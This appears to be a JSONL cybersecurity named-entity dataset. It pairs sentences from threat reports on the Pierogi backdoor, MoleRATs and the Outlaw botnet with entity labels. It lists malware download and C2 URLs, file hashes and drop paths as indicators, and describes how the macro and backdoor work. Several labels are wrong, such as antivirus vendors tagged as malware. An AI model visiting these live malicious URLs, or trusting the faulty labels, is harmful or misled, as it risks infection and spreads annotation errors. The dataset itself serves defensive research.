{"text": "JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&amp;id=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl": [[11, 95]]}, "info": {"id": "aptner_train_001230", "source": "aptner_train"}}
{"text": "JhoneRAT : https://drive.google.com/uc?export=download&amp;id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&amp;id=1OlQssMvjb7gI175qDx8SqTgRJIEp5Ypd": [[11, 95]]}, "info": {"id": "aptner_train_001231", "source": "aptner_train"}}
{"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD": [[11, 91]]}, "info": {"id": "aptner_train_001232", "source": "aptner_train"}}
{"text": "JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a": [[11, 91]]}, "info": {"id": "aptner_train_001233", "source": "aptner_train"}}
{"text": "JhoneRAT : https://twitter.com/jhone87438316 .", "spans": {"Malware: JhoneRAT": [[0, 8]], "Indicator: https://twitter.com/jhone87438316": [[11, 44]]}, "info": {"id": "aptner_train_001234", "source": "aptner_train"}}
{"text": "New Cyber Espionage Campaigns Targeting Palestinians - Part 2 : The Discovery of the New , Mysterious Pierogi backdoor .", "spans": {"Malware: Pierogi backdoor": [[102, 118]]}, "info": {"id": "aptner_train_001235", "source": "aptner_train"}}
{"text": "Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories .", "spans": {"Organization: Cybereason Nocturnus": [[26, 46]]}, "info": {"id": "aptner_train_001236", "source": "aptner_train"}}
{"text": "This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran .", "spans": {"Organization: Palestinian government": [[116, 138]]}, "info": {"id": "aptner_train_001237", "source": "aptner_train"}}
{"text": "Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": {"Malware: Spark backdoor": [[170, 184]]}, "info": {"id": "aptner_train_001238", "source": "aptner_train"}}
{"text": "For more information about part one , click here .", "spans": {}, "info": {"id": "aptner_train_001239", "source": "aptner_train"}}
{"text": "During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason .", "spans": {"Malware: backdoor": [[73, 81]], "Malware: Pierogi": [[91, 98]], "Organization: Cybereason": [[102, 112]]}, "info": {"id": "aptner_train_001240", "source": "aptner_train"}}
{"text": "This backdoor allows attackers to spy on targeted victims .", "spans": {"Malware: backdoor": [[5, 13]]}, "info": {"id": "aptner_train_001241", "source": "aptner_train"}}
{"text": "Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers .", "spans": {"Organization: Cybereason": [[0, 10]], "Malware: backdoor": [[29, 37]]}, "info": {"id": "aptner_train_001242", "source": "aptner_train"}}
{"text": "The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted Palestinians .", "spans": {}, "info": {"id": "aptner_train_001243", "source": "aptner_train"}}
{"text": "In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 .", "spans": {"Organization: MoleRATs": [[94, 102]], "Organization: Gaza Cyber Gang": [[111, 126]], "Organization: Moonlight": [[129, 138]]}, "info": {"id": "aptner_train_001244", "source": "aptner_train"}}
{"text": "Cyber Espionage with a New Malware : The Cybereason Nocturnus team has discovered recent , targeted attacks in the Middle East to deliver the Pierogi backdoor for politically-driven cyber espionage .", "spans": {"Organization: Cybereason Nocturnus": [[41, 61]], "Malware: Pierogi backdoor": [[142, 158]]}, "info": {"id": "aptner_train_001245", "source": "aptner_train"}}
{"text": "Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim ’s machine with the Pierogi backdoor .", "spans": {"Malware: Pierogi backdoor": [[188, 204]]}, "info": {"id": "aptner_train_001247", "source": "aptner_train"}}
{"text": "The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region .", "spans": {}, "info": {"id": "aptner_train_001248", "source": "aptner_train"}}
{"text": "Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) .", "spans": {"Organization: MoleRATs": [[40, 48], [221, 229]], "Organization: Gaza Cybergang": [[236, 250]]}, "info": {"id": "aptner_train_001249", "source": "aptner_train"}}
{"text": "Similar to previous attacks , this campaign starts with social engineering .", "spans": {}, "info": {"id": "aptner_train_001251", "source": "aptner_train"}}
{"text": "In one instance , it lures victims to open an email attachment .", "spans": {"System: email": [[46, 51]]}, "info": {"id": "aptner_train_001252", "source": "aptner_train"}}
{"text": "In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters .", "spans": {}, "info": {"id": "aptner_train_001253", "source": "aptner_train"}}
{"text": "In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document .", "spans": {"System: Microsoft Word document": [[82, 105]], "System: weaponized Microsoft Word": [[111, 136]]}, "info": {"id": "aptner_train_001254", "source": "aptner_train"}}
{"text": "As soon as the victim double-clicks on the dropper , they are presented with the decoy document .", "spans": {}, "info": {"id": "aptner_train_001255", "source": "aptner_train"}}
{"text": "The document lowers the victim ’s suspicions by distracting them with a real document while the dropper installs the backdoor .", "spans": {"Malware: backdoor": [[117, 125]]}, "info": {"id": "aptner_train_001256", "source": "aptner_train"}}
{"text": "However , some of the documents also play an additional role in the attack .", "spans": {}, "info": {"id": "aptner_train_001257", "source": "aptner_train"}}
{"text": "While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda .", "spans": {}, "info": {"id": "aptner_train_001258", "source": "aptner_train"}}
{"text": "With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos .", "spans": {"Organization: Unit 42": [[112, 119]], "Organization: Talos": [[126, 131]]}, "info": {"id": "aptner_train_001259", "source": "aptner_train"}}
{"text": "The contents of the decoy documents seems to include :", "spans": {}, "info": {"id": "aptner_train_001260", "source": "aptner_train"}}
{"text": "Potentially fake documents that appear to be issued by the Palestinian government .", "spans": {"Organization: Palestinian government": [[59, 81]]}, "info": {"id": "aptner_train_001261", "source": "aptner_train"}}
{"text": "Meetings minutes of different Palestinian organizations .", "spans": {}, "info": {"id": "aptner_train_001262", "source": "aptner_train"}}
{"text": "News about Hamas and the Palestinian National Authority .", "spans": {"Organization: Palestinian National Authority": [[25, 55]]}, "info": {"id": "aptner_train_001263", "source": "aptner_train"}}
{"text": "Potentially fake , leaked Hamas documents .", "spans": {}, "info": {"id": "aptner_train_001264", "source": "aptner_train"}}
{"text": "Criticism of and embarrassing content about Hamas .", "spans": {}, "info": {"id": "aptner_train_001265", "source": "aptner_train"}}
{"text": "APA adopted resolution Unlimited support for Palestinian people.docx :", "spans": {"Organization: APA": [[0, 3]]}, "info": {"id": "aptner_train_001266", "source": "aptner_train"}}
{"text": "Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa.rar :", "spans": {"Organization: Asian Parliamentary Assembly": [[30, 58]], "Organization: APA": [[61, 64]], "Indicator: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[142, 206]], "Indicator: jalsa.rar": [[209, 218]]}, "info": {"id": "aptner_train_001267", "source": "aptner_train"}}
{"text": "Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b .", "spans": {"Indicator: 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b": [[117, 181]]}, "info": {"id": "aptner_train_001268", "source": "aptner_train"}}
{"text": "Internet in government.pdf / Define the Internet in government institutions.pdf :", "spans": {"Indicator: Internet in government.pdf": [[0, 26]], "Indicator: Define the Internet in government institutions.pdf": [[29, 79]]}, "info": {"id": "aptner_train_001269", "source": "aptner_train"}}
{"text": "Announcement about a new regulation regarding internet usage in Palestinian government institutions .", "spans": {"Organization: Palestinian government": [[64, 86]]}, "info": {"id": "aptner_train_001270", "source": "aptner_train"}}
{"text": "The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 .", "spans": {"Indicator: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[85, 149]]}, "info": {"id": "aptner_train_001271", "source": "aptner_train"}}
{"text": "Congratulations_Jan-7.pdf :", "spans": {"Indicator: Congratulations_Jan-7.pdf": [[0, 25]]}, "info": {"id": "aptner_train_001272", "source": "aptner_train"}}
{"text": "Letter allegedly from the Barcelona branch of the", "spans": {"Organization: Barcelona": [[26, 35]]}, "info": {"id": "aptner_train_001273", "source": "aptner_train"}}
{"text": "Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora .", "spans": {"Organization: Federation of Independent Palestinian Communities and Organizations and Events": [[0, 78]]}, "info": {"id": "aptner_train_001274", "source": "aptner_train"}}
{"text": "The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad .", "spans": {"Organization: Syrian Army": [[52, 63]]}, "info": {"id": "aptner_train_001275", "source": "aptner_train"}}
{"text": "The letter ends with “ Death to Israel ” and “ Humiliation and shame to the tyrant America ” 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc .", "spans": {"Indicator: 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc": [[93, 157]]}, "info": {"id": "aptner_train_001276", "source": "aptner_train"}}
{"text": "Daily_Report.docx :", "spans": {"Indicator: Daily_Report.docx": [[0, 17]]}, "info": {"id": "aptner_train_001277", "source": "aptner_train"}}
{"text": "Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 .", "spans": {"Organization: Palestinian govenment": [[43, 64]], "Indicator: d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428": [[80, 144]]}, "info": {"id": "aptner_train_001278", "source": "aptner_train"}}
{"text": "Directory of Government Services.pdf :", "spans": {"Indicator: Directory of Government Services.pdf": [[0, 36]]}, "info": {"id": "aptner_train_001279", "source": "aptner_train"}}
{"text": "A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 .", "spans": {"Organization: Palestinian government": [[35, 57]], "Indicator: 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8": [[108, 172]]}, "info": {"id": "aptner_train_001280", "source": "aptner_train"}}
{"text": "Meeting Agenda.pdf :", "spans": {"Indicator: Meeting Agenda.pdf": [[0, 18]]}, "info": {"id": "aptner_train_001281", "source": "aptner_train"}}
{"text": "Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G.jpg :", "spans": {"Indicator: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[15, 79]], "Indicator: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[82, 120]]}, "info": {"id": "aptner_train_001282", "source": "aptner_train"}}
{"text": "potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb .", "spans": {"Indicator: 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb": [[128, 192]]}, "info": {"id": "aptner_train_001283", "source": "aptner_train"}}
{"text": "Asala.mp3 :", "spans": {"Indicator: Asala.mp3": [[0, 9]]}, "info": {"id": "aptner_train_001284", "source": "aptner_train"}}
{"text": "An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : “ where is my loved one? ” ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 .", "spans": {"Indicator: .mp3": [[3, 7]], "Indicator: 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964": [[133, 197]]}, "info": {"id": "aptner_train_001285", "source": "aptner_train"}}
{"text": "In addition to the documents , the content includes a number of political cartoons that criticize Hamas ’ relations with Iran and Hamas ’ standing as a resistance movement .", "spans": {}, "info": {"id": "aptner_train_001286", "source": "aptner_train"}}
{"text": "While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro that downloads and installs the backdoor used in this attack .", "spans": {"System: Malicious Microsoft Word document": [[73, 106]], "Organization: Cybereason Nocturnus": [[113, 133]], "System: weaponized Microsoft Word document": [[153, 187]], "System: downloader macro": [[205, 221]], "Malware: backdoor": [[254, 262]]}, "info": {"id": "aptner_train_001287", "source": "aptner_train"}}
{"text": "CV Manal 1 :", "spans": {"Indicator: CV Manal 1": [[0, 10]]}, "info": {"id": "aptner_train_001288", "source": "aptner_train"}}
{"text": "Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f .", "spans": {"Organization: Palestinian Authority": [[33, 54]], "Indicator: 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f": [[55, 119]]}, "info": {"id": "aptner_train_001289", "source": "aptner_train"}}
{"text": "Employee-entitlements-2020.doc :", "spans": {"Indicator: Employee-entitlements-2020.doc": [[0, 30]]}, "info": {"id": "aptner_train_001290", "source": "aptner_train"}}
{"text": "A statement of the Ministry of Finance on civil and military employee benefits and salaries , discussing the conterversial issue Palestinian Authority employees that have not been paid or paid in full their salaries b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 .", "spans": {"Organization: Ministry of Finance": [[19, 38]], "Organization: Palestinian Authority": [[129, 150]], "Indicator: b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80": [[216, 280]]}, "info": {"id": "aptner_train_001291", "source": "aptner_train"}}
{"text": "When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro code to run .", "spans": {"System: malicious macro": [[112, 127]]}, "info": {"id": "aptner_train_001292", "source": "aptner_train"}}
{"text": "The macro code embedded in the document is rather simple and is not obfuscated .", "spans": {}, "info": {"id": "aptner_train_001293", "source": "aptner_train"}}
{"text": "In fact , it is almost unusual in its unsophistication .", "spans": {}, "info": {"id": "aptner_train_001294", "source": "aptner_train"}}
{"text": "The macro code does the following :", "spans": {}, "info": {"id": "aptner_train_001295", "source": "aptner_train"}}
{"text": "Downloads a Base64 encoded payload from the following URL :", "spans": {}, "info": {"id": "aptner_train_001296", "source": "aptner_train"}}
{"text": "http://linda-callaghan.icu/Minkowski/brown .", "spans": {"Indicator: http://linda-callaghan.icu/Minkowski/brown": [[0, 42]]}, "info": {"id": "aptner_train_001297", "source": "aptner_train"}}
{"text": "Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt .", "spans": {}, "info": {"id": "aptner_train_001298", "source": "aptner_train"}}
{"text": "Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe .", "spans": {"Indicator: C:\\ProgramData\\IntegratedOffice.exe": [[50, 85]]}, "info": {"id": "aptner_train_001299", "source": "aptner_train"}}
{"text": "Runs the executable file and deletes the .txt file .", "spans": {"Indicator: .txt": [[41, 45]]}, "info": {"id": "aptner_train_001300", "source": "aptner_train"}}
{"text": "Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi .", "spans": {"Malware: Pierogi": [[0, 7]], "Malware: backdoor": [[14, 22]], "System: backdoor": [[60, 68]], "System: Delphi": [[80, 86]]}, "info": {"id": "aptner_train_001301", "source": "aptner_train"}}
{"text": "It enables the attackers to spy on victims using rather basic backdoor capabilities .", "spans": {"Malware: backdoor": [[62, 70]]}, "info": {"id": "aptner_train_001302", "source": "aptner_train"}}
{"text": "While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers .", "spans": {"Malware: backdoor": [[46, 54]]}, "info": {"id": "aptner_train_001303", "source": "aptner_train"}}
{"text": "The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian .", "spans": {"System: C2": [[42, 44]]}, "info": {"id": "aptner_train_001304", "source": "aptner_train"}}
{"text": "This is why we chose to name the malware Pierogi , after the popular East European dish .", "spans": {"Malware: Pierogi": [[41, 48]]}, "info": {"id": "aptner_train_001305", "source": "aptner_train"}}
{"text": "The backdoor has the following capabilities :", "spans": {}, "info": {"id": "aptner_train_001306", "source": "aptner_train"}}
{"text": "Collects information about the infected machine .", "spans": {}, "info": {"id": "aptner_train_001307", "source": "aptner_train"}}
{"text": "Uploads files to the attackers ’ server .", "spans": {}, "info": {"id": "aptner_train_001308", "source": "aptner_train"}}
{"text": "Downloads additional payloads .", "spans": {}, "info": {"id": "aptner_train_001309", "source": "aptner_train"}}
{"text": "Takes screenshots from the infected machine .", "spans": {}, "info": {"id": "aptner_train_001310", "source": "aptner_train"}}
{"text": "Executes arbitrary commands via the CMD shell .", "spans": {"System: CMD shell": [[36, 45]]}, "info": {"id": "aptner_train_001311", "source": "aptner_train"}}
{"text": "In addition to spy features , the backdoor also implements a few checks to ensure it is running in a safe environment .", "spans": {"Malware: backdoor": [[34, 42]]}, "info": {"id": "aptner_train_001312", "source": "aptner_train"}}
{"text": "Specifically , it looks for antivirus and other security products .", "spans": {}, "info": {"id": "aptner_train_001313", "source": "aptner_train"}}
{"text": "The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender .", "spans": {"Malware: backdoor": [[4, 12]], "System: Windows": [[21, 28]], "System: WMI": [[68, 71]], "Organization: Kaspersky": [[203, 212]], "Malware: eScan": [[215, 220]], "Malware: F-secure": [[223, 231]], "Malware: Bitdefender": [[236, 247]]}, "info": {"id": "aptner_train_001314", "source": "aptner_train"}}
{"text": "The backdoor achieves persistence using a classic startup item autorun technique :", "spans": {"Malware: backdoor": [[4, 12]]}, "info": {"id": "aptner_train_001315", "source": "aptner_train"}}
{"text": "A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup .", "spans": {}, "info": {"id": "aptner_train_001316", "source": "aptner_train"}}
{"text": "Once the user logs on to the infected machine , the shortcut points to the file binary location in the C:\\ProgramData\\ folder .", "spans": {}, "info": {"id": "aptner_train_001317", "source": "aptner_train"}}
{"text": "The GUID generated by the malware is saved in a file called GUID.bin .", "spans": {"System: GUID": [[4, 8]], "Indicator: GUID.bin": [[60, 68]]}, "info": {"id": "aptner_train_001318", "source": "aptner_train"}}
{"text": "This file is created in the same folder as the binary of the backdoor", "spans": {"Malware: backdoor": [[61, 69]]}, "info": {"id": "aptner_train_001319", "source": "aptner_train"}}
{"text": "( C:\\ProgramData\\GUID.bin ) .", "spans": {}, "info": {"id": "aptner_train_001320", "source": "aptner_train"}}
{"text": "The backdoor has rather basic C2 functionality implemented through a predefined set of URLs :", "spans": {"Malware: backdoor": [[4, 12]], "System: C2": [[30, 32]]}, "info": {"id": "aptner_train_001321", "source": "aptner_train"}}
{"text": "1 .", "spans": {}, "info": {"id": "aptner_train_001322", "source": "aptner_train"}}
{"text": "Sending machine information and a heartbeat to the C2 :", "spans": {"System: C2": [[51, 53]]}, "info": {"id": "aptner_train_001323", "source": "aptner_train"}}
{"text": "URL : http://nicoledotson.icu/debby/weatherford/Yortysnr The information sent to the C2 includes :", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Yortysnr": [[6, 56]], "System: C2": [[85, 87]]}, "info": {"id": "aptner_train_001324", "source": "aptner_train"}}
{"text": "cname :", "spans": {}, "info": {"id": "aptner_train_001325", "source": "aptner_train"}}
{"text": "computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . aname : the location of the malware on the infected machine .", "spans": {"System: GUID": [[31, 35]]}, "info": {"id": "aptner_train_001326", "source": "aptner_train"}}
{"text": "Requesting commands from the C2 server :", "spans": {"System: C2": [[29, 31]]}, "info": {"id": "aptner_train_001327", "source": "aptner_train"}}
{"text": "URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza .", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[6, 58]]}, "info": {"id": "aptner_train_001328", "source": "aptner_train"}}
{"text": "Ekspertyza means expertise or examination in Ukranian .", "spans": {}, "info": {"id": "aptner_train_001329", "source": "aptner_train"}}
{"text": "There are 3 basic commands coming from the server in the form of MD5 hashes :", "spans": {}, "info": {"id": "aptner_train_001330", "source": "aptner_train"}}
{"text": "Dfff0a7fa1a55c8c1a4966c19f6da452 : cmd . 51a7a76a7dd5d9e4651fe3d4c74d16d6 : downloadfile . 62c92ba585f74ecdbef4c4498a438984 : screenshot .", "spans": {"Indicator: Dfff0a7fa1a55c8c1a4966c19f6da452": [[0, 32]], "Indicator: 51a7a76a7dd5d9e4651fe3d4c74d16d6": [[41, 73]], "Indicator: 62c92ba585f74ecdbef4c4498a438984": [[91, 123]]}, "info": {"id": "aptner_train_001331", "source": "aptner_train"}}
{"text": "Uploading data ( mainly screenshots ) to the C2 :", "spans": {"System: C2": [[45, 47]]}, "info": {"id": "aptner_train_001332", "source": "aptner_train"}}
{"text": "URL : http://nicoledotson.icu/debby/weatherford/Zavantazhyty .", "spans": {"Indicator: http://nicoledotson.icu/debby/weatherford/Zavantazhyty": [[6, 60]]}, "info": {"id": "aptner_train_001333", "source": "aptner_train"}}
{"text": "Zavantazhyty means to load or download in Ukranian .", "spans": {}, "info": {"id": "aptner_train_001334", "source": "aptner_train"}}
{"text": "This command is used to upload collected data to the C2 server .", "spans": {"System: C2": [[53, 55]]}, "info": {"id": "aptner_train_001335", "source": "aptner_train"}}
{"text": "For example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below .", "spans": {"Malware: backdoor": [[36, 44]]}, "info": {"id": "aptner_train_001336", "source": "aptner_train"}}
{"text": "Removing information :", "spans": {}, "info": {"id": "aptner_train_001337", "source": "aptner_train"}}
{"text": "URL : http://nicoledotso.icu/debby/weatherford/Vydalyty .", "spans": {"Indicator: http://nicoledotso.icu/debby/weatherford/Vydalyty": [[6, 55]]}, "info": {"id": "aptner_train_001338", "source": "aptner_train"}}
{"text": "Vydalyty means to remove or delete in Ukrainian .", "spans": {}, "info": {"id": "aptner_train_001339", "source": "aptner_train"}}
{"text": "The malware can delete various requests based on the command below .", "spans": {}, "info": {"id": "aptner_train_001340", "source": "aptner_train"}}
{"text": "The records of the domains and IPs involved in this campaign seem to show that the attackers created a new infrastructure specifically for this campaign .", "spans": {}, "info": {"id": "aptner_train_001341", "source": "aptner_train"}}
{"text": "The domains were registered in November 2019 and operationalized shortly after .", "spans": {}, "info": {"id": "aptner_train_001342", "source": "aptner_train"}}
{"text": "In part two of this research , we examined the Pierogi campaign .", "spans": {}, "info": {"id": "aptner_train_001343", "source": "aptner_train"}}
{"text": "Cybereason suspects this", "spans": {"Organization: Cybereason": [[0, 10]]}, "info": {"id": "aptner_train_001344", "source": "aptner_train"}}
{"text": "campaign targets Palestinian individuals and entities in the Middle East , specifically directed at", "spans": {}, "info": {"id": "aptner_train_001345", "source": "aptner_train"}}
{"text": "those in the Palestinian government .", "spans": {"Organization: Palestinian government": [[13, 35]]}, "info": {"id": "aptner_train_001346", "source": "aptner_train"}}
{"text": "The threat actors behind the campaign use social engineering to infect their victims with the Pierogi backdoor for cyber espionage purposes .", "spans": {"Malware: Pierogi backdoor": [[94, 110]]}, "info": {"id": "aptner_train_001347", "source": "aptner_train"}}
{"text": "The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East .", "spans": {}, "info": {"id": "aptner_train_001348", "source": "aptner_train"}}
{"text": "In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated", "spans": {"Organization: MoleRATs": [[150, 158]]}, "info": {"id": "aptner_train_001349", "source": "aptner_train"}}
{"text": "in the Middle East since 2012 .", "spans": {}, "info": {"id": "aptner_train_001350", "source": "aptner_train"}}
{"text": "The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims .", "spans": {"Malware: Pierogi backdoor": [[4, 20]], "Organization: Cybereason": [[35, 45]]}, "info": {"id": "aptner_train_001351", "source": "aptner_train"}}
{"text": "Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group .", "spans": {"Malware: backdoor": [[47, 55], [101, 109]], "Organization: Cybereason": [[58, 68]]}, "info": {"id": "aptner_train_001352", "source": "aptner_train"}}
{"text": "As we ’ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n’t necessarily mean inactivity .", "spans": {}, "info": {"id": "aptner_train_001354", "source": "aptner_train"}}
{"text": "This time , the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit ( CVE-2016-5195 ) as attack vectors .", "spans": {"Vulnerability: CVE-2016-8655": [[63, 76]], "Vulnerability: Dirty COW": [[81, 90]], "Vulnerability: CVE-2016-5195": [[101, 114]]}, "info": {"id": "aptner_train_001363", "source": "aptner_train"}}
{"text": "Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials .", "spans": {}, "info": {"id": "aptner_train_001364", "source": "aptner_train"}}
{"text": "We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online .", "spans": {}, "info": {"id": "aptner_train_001367", "source": "aptner_train"}}
{"text": "The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times .", "spans": {}, "info": {"id": "aptner_train_001368", "source": "aptner_train"}}
{"text": "The tsm binary then runs in the background , forwarding a series of error messages to /dev/null to keep the code running , ensuring the continuous execution of the code referenced with a set of parameters /tmp/up.txt .", "spans": {}, "info": {"id": "aptner_train_001374", "source": "aptner_train"}}
{"text": "The script then waits 20 minutes before it runs the wrapper script initall :", "spans": {"Indicator: initall": [[67, 74]]}, "info": {"id": "aptner_train_001375", "source": "aptner_train"}}
{"text": "2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a install .", "spans": {"Indicator: 2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a": [[0, 64]], "Indicator: install": [[65, 72]]}, "info": {"id": "aptner_train_001376", "source": "aptner_train"}}
{"text": " . 93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494", "spans": {}, "info": {"id": "aptner_train_001384", "source": "aptner_train"}}
{"text": " .", "spans": {}, "info": {"id": "aptner_train_001385", "source": "aptner_train"}}
{"text": "However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits ’ latest version .", "spans": {}, "info": {"id": "aptner_train_001393", "source": "aptner_train"}}
{"text": "We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs .", "spans": {"System: Android Package Kits-": [[24, 45]], "System: APK-": [[48, 52]], "System: Android Debug Bridge": [[59, 79]], "System: ADB": [[82, 85]], "System: Android-based TVs": [[151, 168]]}, "info": {"id": "aptner_train_001397", "source": "aptner_train"}}
{"text": "Furthermore , based on the group ’s use of dated exploits as vectors that companies would have likely addressed with monitoring and regular patching schedules , it appears that they ’re going after enterprises who have yet to patch their systems , as well as companies with internet-facing systems with weak to no monitoring of traffic and activities .", "spans": {}, "info": {"id": "aptner_train_001401", "source": "aptner_train"}}
{"text": "Considering the amount of resources needed to deploy all the necessary patches for an enterprise ( such as quality testing and operations alignment ) , which implies costly downtime for operations and the hesitation to update all systems immediately , Outlaw may find even more targets and victims for their updated botnets every time there is a patch released and waiting to be downloaded .", "spans": {"Organization: Outlaw": [[252, 258]]}, "info": {"id": "aptner_train_001402", "source": "aptner_train"}}
{"text": "Save for a few iteration updates , combinations from previous deployments , and using the routines repetitively for every campaign , we found very little changes in the group ’s toolkit , which allowed various honeypots across the Eastern European region to detect many of the sent binaries .", "spans": {"Malware: honeypots": [[210, 219]]}, "info": {"id": "aptner_train_001403", "source": "aptner_train"}}
